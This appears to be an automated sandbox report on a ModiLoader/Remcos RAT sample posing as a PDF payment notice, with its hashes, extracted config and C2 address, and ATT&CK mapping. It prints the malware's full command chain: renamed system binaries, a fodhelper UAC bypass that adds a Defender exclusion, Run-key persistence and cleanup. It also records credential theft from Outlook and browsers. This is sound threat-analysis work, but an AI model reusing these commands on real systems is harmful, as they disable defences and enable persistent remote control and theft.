modiloader | d8a2540d2a73aad003319a27da2bc446f9f2970e0f9566c6b29fed61cba00cb6

Analysis

max time kernel
122s
max time network
129s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
26-03-2024 10:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

DEBIT_ADVICE_000610PAY001522024.PDF.bat
Size

3.1MB
MD5

37a23ddeb4d10dc479c3cda8bcad8fa6
SHA1

8cf2add3ffd2840c508bd8b06f9a29d9a4fb7bf5
SHA256

0a2ae63e384bb787bfaf113777640ad36ce8aabc235fd071de1cc746f32c1701
SHA512

aae48f4509124f6e041e96a32da0071727244d909b84b5189fd153a74f07a5dc208f4e46b98166d0aa9b25c19277796c8c01f4faaec793c95c8c03b83ef05bba
SSDEEP

24576:2wyJPcV/Hrrz6jT6vaQrAAAy4QE1FpVJQQul6kE82zg38H6HKpLJrvvfzrEZnfQL:9yJPcVHQNQrAAHEPJQT7Z38dEog3xfO

Score

10^/10

modiloader remcos remotehost collection persistence rat trojan

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

127.0.0.1:45671

127.0.0.1:55677

192.3.101.8:55677

192.3.101.8:45671

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-2P1XPK
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

ModiLoader Second Stage 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/3056-56-0x0000000002D00000-0x0000000003D00000-memory.dmp	modiloader_stage2

NirSoft MailPassView 2 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral1/memory/1596-175-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView
behavioral1/memory/1596-188-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 2 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral1/memory/1568-167-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView
behavioral1/memory/1568-184-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Nirsoft 6 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1568-167-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/1596-175-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/2684-178-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/2684-179-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/1568-184-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/1596-188-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft

Executes dropped EXE 18 IoCs

Processes:

alpha.exealpha.exealpha.exexkn.exealpha.exealpha.exekn.exealpha.exekn.exeLewxa.comalpha.exealpha.exealpha.exealpha.exealpha.exealpha.exe2163949.exe2163949.exe

pid	process
2800	alpha.exe
2996	alpha.exe
2508	alpha.exe
2620	xkn.exe
2812	alpha.exe
2212	alpha.exe
2412	kn.exe
2468	alpha.exe
2524	kn.exe
3056	Lewxa.com
2572	alpha.exe
2908	alpha.exe
2020	alpha.exe
2320	alpha.exe
2736	alpha.exe
1700	alpha.exe
2296	2163949.exe
1516	2163949.exe

Loads dropped DLL 8 IoCs

Processes:

cmd.exealpha.exexkn.exealpha.exe

pid process

2260 cmd.exe
2260 cmd.exe
2260 cmd.exe
2508 alpha.exe
2620 xkn.exe
2620 xkn.exe
2620 xkn.exe
2212 alpha.exe

pid	process
2260	cmd.exe
2260	cmd.exe
2260	cmd.exe
2508	alpha.exe
2620	xkn.exe
2620	xkn.exe
2620	xkn.exe
2212	alpha.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

colorcpl.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	colorcpl.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Lewxa.com

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Koomxsve = "C:\\Users\\Public\\Koomxsve.url"	Lewxa.com

Suspicious use of SetThreadContext 3 IoCs

Processes:

colorcpl.exe

description	pid	process	target process
PID 1560 set thread context of 1568	1560	colorcpl.exe	colorcpl.exe
PID 1560 set thread context of 1596	1560	colorcpl.exe	colorcpl.exe
PID 1560 set thread context of 2684	1560	colorcpl.exe	colorcpl.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2676 1560 WerFault.exe colorcpl.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

2716 taskkill.exe
1824 taskkill.exe

pid	pid_target	process	target process
2676	1560	WerFault.exe	colorcpl.exe

pid	process
2716	taskkill.exe
1824	taskkill.exe

Modifies registry class 5 IoCs

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\ms-settings\shell\open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\ms-settings\shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\ms-settings\shell\open	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\\Users "	reg.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2676 reg.exe
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 4 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

Lewxa.com

pid process

3056 Lewxa.com
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

xkn.execolorcpl.exe

pid process

2620 xkn.exe
1568 colorcpl.exe
1568 colorcpl.exe
Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

colorcpl.exe

pid process

1560 colorcpl.exe
1560 colorcpl.exe
1560 colorcpl.exe

pid	process
2676	reg.exe

description	flow	ioc
HTTP User-Agent header	4	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

pid	process
3056	Lewxa.com

pid	process
2620	xkn.exe
1568	colorcpl.exe
1568	colorcpl.exe

pid	process
1560	colorcpl.exe
1560	colorcpl.exe
1560	colorcpl.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

xkn.exetaskkill.exetaskkill.execolorcpl.exe

description	pid	process
Token: SeDebugPrivilege	2620	xkn.exe
Token: SeDebugPrivilege	2716	taskkill.exe
Token: SeDebugPrivilege	1824	taskkill.exe
Token: SeDebugPrivilege	2684	colorcpl.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

colorcpl.exe

pid process

1560 colorcpl.exe

pid	process
1560	colorcpl.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.execmd.exealpha.exealpha.exealpha.exexkn.exealpha.exealpha.exealpha.exealpha.exe

description	pid	process	target process
PID 2260 wrote to memory of 1548	2260	cmd.exe	cmd.exe
PID 2260 wrote to memory of 1548	2260	cmd.exe	cmd.exe
PID 2260 wrote to memory of 1548	2260	cmd.exe	cmd.exe
PID 1548 wrote to memory of 2060	1548	cmd.exe	extrac32.exe
PID 1548 wrote to memory of 2060	1548	cmd.exe	extrac32.exe
PID 1548 wrote to memory of 2060	1548	cmd.exe	extrac32.exe
PID 2260 wrote to memory of 2800	2260	cmd.exe	alpha.exe
PID 2260 wrote to memory of 2800	2260	cmd.exe	alpha.exe
PID 2260 wrote to memory of 2800	2260	cmd.exe	alpha.exe
PID 2800 wrote to memory of 2900	2800	alpha.exe	extrac32.exe
PID 2800 wrote to memory of 2900	2800	alpha.exe	extrac32.exe
PID 2800 wrote to memory of 2900	2800	alpha.exe	extrac32.exe
PID 2260 wrote to memory of 2996	2260	cmd.exe	alpha.exe
PID 2260 wrote to memory of 2996	2260	cmd.exe	alpha.exe
PID 2260 wrote to memory of 2996	2260	cmd.exe	alpha.exe
PID 2996 wrote to memory of 2512	2996	alpha.exe	extrac32.exe
PID 2996 wrote to memory of 2512	2996	alpha.exe	extrac32.exe
PID 2996 wrote to memory of 2512	2996	alpha.exe	extrac32.exe
PID 2260 wrote to memory of 2508	2260	cmd.exe	alpha.exe
PID 2260 wrote to memory of 2508	2260	cmd.exe	alpha.exe
PID 2260 wrote to memory of 2508	2260	cmd.exe	alpha.exe
PID 2508 wrote to memory of 2620	2508	alpha.exe	xkn.exe
PID 2508 wrote to memory of 2620	2508	alpha.exe	xkn.exe
PID 2508 wrote to memory of 2620	2508	alpha.exe	xkn.exe
PID 2620 wrote to memory of 2812	2620	xkn.exe	alpha.exe
PID 2620 wrote to memory of 2812	2620	xkn.exe	alpha.exe
PID 2620 wrote to memory of 2812	2620	xkn.exe	alpha.exe
PID 2812 wrote to memory of 2676	2812	alpha.exe	reg.exe
PID 2812 wrote to memory of 2676	2812	alpha.exe	reg.exe
PID 2812 wrote to memory of 2676	2812	alpha.exe	reg.exe
PID 2260 wrote to memory of 2212	2260	cmd.exe	alpha.exe
PID 2260 wrote to memory of 2212	2260	cmd.exe	alpha.exe
PID 2260 wrote to memory of 2212	2260	cmd.exe	alpha.exe
PID 2212 wrote to memory of 2412	2212	alpha.exe	kn.exe
PID 2212 wrote to memory of 2412	2212	alpha.exe	kn.exe
PID 2212 wrote to memory of 2412	2212	alpha.exe	kn.exe
PID 2260 wrote to memory of 2468	2260	cmd.exe	alpha.exe
PID 2260 wrote to memory of 2468	2260	cmd.exe	alpha.exe
PID 2260 wrote to memory of 2468	2260	cmd.exe	alpha.exe
PID 2468 wrote to memory of 2524	2468	alpha.exe	kn.exe
PID 2468 wrote to memory of 2524	2468	alpha.exe	kn.exe
PID 2468 wrote to memory of 2524	2468	alpha.exe	kn.exe
PID 2260 wrote to memory of 3056	2260	cmd.exe	Lewxa.com
PID 2260 wrote to memory of 3056	2260	cmd.exe	Lewxa.com
PID 2260 wrote to memory of 3056	2260	cmd.exe	Lewxa.com
PID 2260 wrote to memory of 3056	2260	cmd.exe	Lewxa.com
PID 2260 wrote to memory of 2572	2260	cmd.exe	alpha.exe
PID 2260 wrote to memory of 2572	2260	cmd.exe	alpha.exe
PID 2260 wrote to memory of 2572	2260	cmd.exe	alpha.exe
PID 2260 wrote to memory of 2908	2260	cmd.exe	alpha.exe
PID 2260 wrote to memory of 2908	2260	cmd.exe	alpha.exe
PID 2260 wrote to memory of 2908	2260	cmd.exe	alpha.exe
PID 2260 wrote to memory of 2020	2260	cmd.exe	alpha.exe
PID 2260 wrote to memory of 2020	2260	cmd.exe	alpha.exe
PID 2260 wrote to memory of 2020	2260	cmd.exe	alpha.exe
PID 2260 wrote to memory of 2320	2260	cmd.exe	alpha.exe
PID 2260 wrote to memory of 2320	2260	cmd.exe	alpha.exe
PID 2260 wrote to memory of 2320	2260	cmd.exe	alpha.exe
PID 2260 wrote to memory of 2736	2260	cmd.exe	alpha.exe
PID 2260 wrote to memory of 2736	2260	cmd.exe	alpha.exe
PID 2260 wrote to memory of 2736	2260	cmd.exe	alpha.exe
PID 2736 wrote to memory of 2716	2736	alpha.exe	taskkill.exe
PID 2736 wrote to memory of 2716	2736	alpha.exe	taskkill.exe
PID 2736 wrote to memory of 2716	2736	alpha.exe	taskkill.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\DEBIT_ADVICE_000610PAY001522024.PDF.bat"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2260

C:\Windows\system32\cmd.exe
cmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:1548

C:\Windows\system32\extrac32.exe
extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
3⤵
PID:2060

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2800

C:\Windows\system32\extrac32.exe
extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
3⤵
PID:2900

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2996

C:\Windows\system32\extrac32.exe
extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
3⤵
PID:2512

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2508

C:\Users\Public\xkn.exe
C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2620

C:\Users\Public\alpha.exe
"C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2812

C:\Windows\system32\reg.exe
reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
5⤵
- Modifies registry class
- Modifies registry key
PID:2676

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\DEBIT_ADVICE_000610PAY001522024.PDF.bat" "C:\\Users\\Public\\Lewxa.txt" 9
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2212

C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\DEBIT_ADVICE_000610PAY001522024.PDF.bat" "C:\\Users\\Public\\Lewxa.txt" 9
3⤵
- Executes dropped EXE
PID:2412

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2468

C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
3⤵
- Executes dropped EXE
PID:2524

C:\Users\Public\Libraries\Lewxa.com
C:\\Users\\Public\\Libraries\\Lewxa.com
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3056

C:\Windows\SysWOW64\cmd.exe
cmd /c mkdir "\\?\C:\Windows "
3⤵
PID:2440

C:\Windows\SysWOW64\cmd.exe
cmd /c mkdir "\\?\C:\Windows \System32"
3⤵
PID:3048

C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Windows \System32\2163949.exe"
3⤵
PID:1784

C:\Windows \System32\2163949.exe
"C:\Windows \System32\2163949.exe"
4⤵
- Executes dropped EXE
PID:2296

C:\Windows \System32\2163949.exe
"C:\Windows \System32\2163949.exe"
4⤵
- Executes dropped EXE
PID:1516

C:\Windows\SysWOW64\extrac32.exe
C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Lewxa.com C:\\Users\\Public\\Libraries\\Koomxsve.PIF
3⤵
PID:2984

C:\Windows\SysWOW64\colorcpl.exe
C:\Windows\System32\colorcpl.exe
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:1560

C:\Windows\SysWOW64\colorcpl.exe
C:\Windows\SysWOW64\colorcpl.exe /stext "C:\Users\Admin\AppData\Local\Temp\hnaoadhuqvzgjbmnmwxhxdcrzbqrdnule"
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1568

C:\Windows\SysWOW64\colorcpl.exe
C:\Windows\SysWOW64\colorcpl.exe /stext "C:\Users\Admin\AppData\Local\Temp\rhfgb"
4⤵
- Accesses Microsoft Outlook accounts
PID:1596

C:\Windows\SysWOW64\colorcpl.exe
C:\Windows\SysWOW64\colorcpl.exe /stext "C:\Users\Admin\AppData\Local\Temp\tjkztnlpa"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1560 -s 740
4⤵
- Program crash
PID:2676

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:2572

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:2908

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:2020

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:2320

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2736

C:\Windows\system32\taskkill.exe
taskkill /F /IM SystemSettings.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2716

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe
2⤵
- Executes dropped EXE
PID:1700

C:\Windows\system32\taskkill.exe
taskkill /F /IM SystemSettingsAdminFlows.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1824

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
67KB

MD5
753df6889fd7410a2e9fe333da83a429

SHA1
3c425f16e8267186061dd48ac1c77c122962456e

SHA256
b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

SHA512
9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar919C.tmp

Filesize
175KB

MD5
dd73cead4b93366cf3465c8cd32e2796

SHA1
74546226dfe9ceb8184651e920d1dbfb432b314e

SHA256
a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

SHA512
ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

Download Submit
C:\Users\Admin\AppData\Local\Temp\hnaoadhuqvzgjbmnmwxhxdcrzbqrdnule

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Public\Lewxa.txt

Filesize
2.2MB

MD5
8f6b3132069a25963b93083743e160dd

SHA1
364112fc579f11dfa82a3c1078ec19706cd6dfda

SHA256
5184b2c7c5ffbaf8b8c9bac27545f09447b61d619a2f2bf472570b9ebec5747c

SHA512
af3051aeed9de9931f12d48cd22fef3273f9350a1cdd3c476fa02f7550288f7a96112f311d4dadcf61f0a67c93c22ce2999fb6253c8841b9d399e710b8518938

Download Submit
C:\Users\Public\Libraries\Lewxa.com

Filesize
1.1MB

MD5
04aba5a372c8dac9affd6f1578b478b3

SHA1
1e0d764539cbf2e86e0d59b83f407b429f61fdb7

SHA256
b27a5e00f3339d8020da21dabc1c53e001bf5d4a809c47cee65f3e9383568411

SHA512
4d69053814b86bd13b59ca8b147a5331d0eace3ed2aaa936dc35086fdba8ef44d757bdc788eec61338f443578f98b8859f8dd7c7eeef486cab9ecb8eb5be15a3

Download Submit
C:\Windows \System32\2163949.exe

Filesize
128KB

MD5
231ce1e1d7d98b44371ffff407d68b59

SHA1
25510d0f6353dbf0c9f72fc880de7585e34b28ff

SHA256
30951db8bfc21640645aa9144cfeaa294bb7c6980ef236d28552b6f4f3f92a96

SHA512
520887b01bda96b7c4f91b9330a5c03a12f7c7f266d4359432e7bacc76b0eef377c05a4361f8fa80ad0b94b5865699d747a5d94a2d3dcdb85dabf5887bb6c612

Download Submit
\Users\Public\alpha.exe

Filesize
337KB

MD5
5746bd7e255dd6a8afa06f7c42c1ba41

SHA1
0f3c4ff28f354aede202d54e9d1c5529a3bf87d8

SHA256
db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386

SHA512
3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

Download Submit
\Users\Public\kn.exe

Filesize
1.1MB

MD5
ec1fd3050dbc40ec7e87ab99c7ca0b03

SHA1
ae7fdfc29f4ef31e38ebf381e61b503038b5cb35

SHA256
1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3

SHA512
4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

Download Submit
\Users\Public\xkn.exe

Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
memory/1560-142-0x0000000000330000-0x0000000001330000-memory.dmp

Filesize
16.0MB

Download
memory/1560-150-0x0000000000330000-0x0000000001330000-memory.dmp

Filesize
16.0MB

Download
memory/1560-191-0x000000001FA40000-0x000000001FA59000-memory.dmp

Filesize
100KB

Download
memory/1560-187-0x000000001FA40000-0x000000001FA59000-memory.dmp

Filesize
100KB

Download
memory/1560-144-0x0000000000330000-0x0000000001330000-memory.dmp

Filesize
16.0MB

Download
memory/1560-143-0x0000000000330000-0x0000000001330000-memory.dmp

Filesize
16.0MB

Download
memory/1560-147-0x0000000000330000-0x0000000001330000-memory.dmp

Filesize
16.0MB

Download
memory/1560-140-0x0000000000330000-0x0000000001330000-memory.dmp

Filesize
16.0MB

Download
memory/1560-145-0x0000000000330000-0x0000000001330000-memory.dmp

Filesize
16.0MB

Download
memory/1560-156-0x0000000000330000-0x0000000001330000-memory.dmp

Filesize
16.0MB

Download
memory/1560-153-0x0000000000330000-0x0000000001330000-memory.dmp

Filesize
16.0MB

Download
memory/1560-152-0x0000000000330000-0x0000000001330000-memory.dmp

Filesize
16.0MB

Download
memory/1560-151-0x0000000000330000-0x0000000001330000-memory.dmp

Filesize
16.0MB

Download
memory/1568-158-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/1568-160-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1568-164-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1568-167-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1568-184-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1596-170-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1596-165-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1596-175-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1596-188-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1784-123-0x0000000002160000-0x0000000002161000-memory.dmp

Filesize
4KB

Download
memory/2620-32-0x0000000002620000-0x00000000026A0000-memory.dmp

Filesize
512KB

Download
memory/2620-28-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp

Filesize
9.6MB

Download
memory/2620-33-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp

Filesize
9.6MB

Download
memory/2620-29-0x0000000002620000-0x00000000026A0000-memory.dmp

Filesize
512KB

Download
memory/2620-31-0x0000000002620000-0x00000000026A0000-memory.dmp

Filesize
512KB

Download
memory/2620-30-0x0000000002620000-0x00000000026A0000-memory.dmp

Filesize
512KB

Download
memory/2620-21-0x000000001B100000-0x000000001B3E2000-memory.dmp

Filesize
2.9MB

Download
memory/2620-22-0x0000000001F40000-0x0000000001F48000-memory.dmp

Filesize
32KB

Download
memory/2620-34-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp

Filesize
9.6MB

Download
memory/2684-172-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2684-176-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2684-177-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2684-178-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2684-179-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/3056-60-0x0000000000400000-0x0000000000527000-memory.dmp

Filesize
1.2MB

Download
memory/3056-49-0x00000000001C0000-0x00000000001C1000-memory.dmp

Filesize
4KB

Download
memory/3056-55-0x0000000002D00000-0x0000000003D00000-memory.dmp

Filesize
16.0MB

Download
memory/3056-56-0x0000000002D00000-0x0000000003D00000-memory.dmp

Filesize
16.0MB

Download
memory/3056-59-0x00000000001C0000-0x00000000001C1000-memory.dmp

Filesize
4KB

Download